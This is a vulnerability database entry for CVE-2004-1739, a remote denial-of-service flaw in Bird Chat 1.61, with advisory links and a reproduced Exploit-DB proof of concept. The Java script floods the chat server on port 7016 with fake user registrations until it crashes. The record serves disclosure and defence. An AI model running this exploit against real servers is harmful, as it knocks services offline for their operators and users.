CVE-2004-1739
CVSS 5.0
Published: 2004-08-23 00:00:00
Revised: 2016-10-17 23:00:14

[Original] Bird Chat 1.61 allows remote attackers to cause a denial of service (crash) via invalid users.


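[CNNVD] Bird Chat Remote Denial of Service Vulnerability (CNNVD-200408-212)

        A vulnerability exists in Bird Chat version 1.61. Remote attackers can cause a denial of service (crash) via invalid users.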

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

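- CPE (affected platforms and products)

Product and version information (CPE) is not currently available

- OVAL (technical details for detection)

No related OVAL definitions found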

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1739
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1739
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-212
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=109327938924287&w=2
(UNKNOWN)  BUGTRAQ  20040823 DoS in Bird Chat 1.61
http://www.autistici.org/fdonato/advisory/BirdChat1.61-adv.txt
(UNKNOWN)  MISC  http://www.autistici.org/fdonato/advisory/BirdChat1.61-adv.txt
http://www.securityfocus.com/bid/11010
(VENDOR_ADVISORY)  BID  11010
http://xforce.iss.net/xforce/xfdb/17080
(VENDOR_ADVISORY)  XF  bird-chat-dos(17080)

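- Vulnerability information

Bird Chat Remote Denial of Service Vulnerability
Medium severity  Other
2004-08-23 00:00:00 2005-10-20 00:00:00
Remote
        A vulnerability exists in Bird Chat version 1.61. Remote attackers can cause a denial of service (crash) via invalid users.

- Advisories and patches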

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- Vulnerability information (420)

Bird Chat 1.61 - Denial Of Service (EDBID:420)
win32 dos
2004-08-26 Verified
0 Donato Ferrante
N/A
/*
    Bird Chat 1.61 - Denial Of Service - Proof Of Concept
    Coded by: Donato Ferrante
*/



import java.net.Socket;
import java.net.InetAddress;
import java.net.ConnectException;
import java.net.SocketTimeoutException;
import java.io.OutputStream;
import java.io.InputStream;







public class BirdChat161_DoS_poc {



private final static int MAX_CONNECTION = 16;
private final static int PORT = 7016;
private final static String VERSION = "0.1.0";



public static void main(String [] args){



  System.out.println(
                     "\n\nBird Chat 1.61 - Denial Of Service - Proof Of Concept\n" +
                     "Version: " + VERSION + "\n\n"                 +
                     "coded by: Donato Ferrante\n"                  +
                     "e-mail:   fdonato@autistici.org\n"            +
                     "web:      www.autistici.org/fdonato\n\n"
                    );


    String host = "localhost";

        try{

            if(args.length != 1)
                usage();

                host = args[0];

        }catch(Exception e){usage();}
    
        try{


            int i = 1,
                var = 0;


           while(i++ <= MAX_CONNECTION){

            try{

               String err = "";
               int port = PORT;
               InetAddress addr = InetAddress.getByName(host);
               Socket socket = new Socket(addr, port);
               socket.setSoTimeout(3000);



               InputStream stream = socket.getInputStream();

                  int line = stream.read();
                   while(line != -1){

                       if(line == '?'){
                           break;
                       }

                       line = stream.read();

                   }


               OutputStream outStream = socket.getOutputStream();
               outStream.write(("*user=fake_user0" + ++var + "\n").getBytes());


                int count = 0;
               line = stream.read();
                    while(true){

                       line = stream.read();

                        if(line == '\n')
                           count++;

                       if(count >= 3)
                           break;
               }


            }catch(SocketTimeoutException ste){break;}
            catch(ConnectException ce){System.err.println(ce); continue;}
        }


        }catch(Exception e){System.err.println(e);}

        System.out.println("\nBird Chat - Denial Of Service - Proof_Of_Concept terminated.\n\n");
    }







    private static void usage(){

        System.out.println("Usage: java BirdChat161_DoS_poc <host>\n\n");    
        System.exit(-1);
    }
}


// milw0rm.com [2004-08-26]		

- Vulnerability information

9142
Bird Chat Spoofed User Flood DoS
Remote / Network Access Denial of Service
Loss of Availability Solution Unknown
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2004-08-23 Unknown
2004-08-23 Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
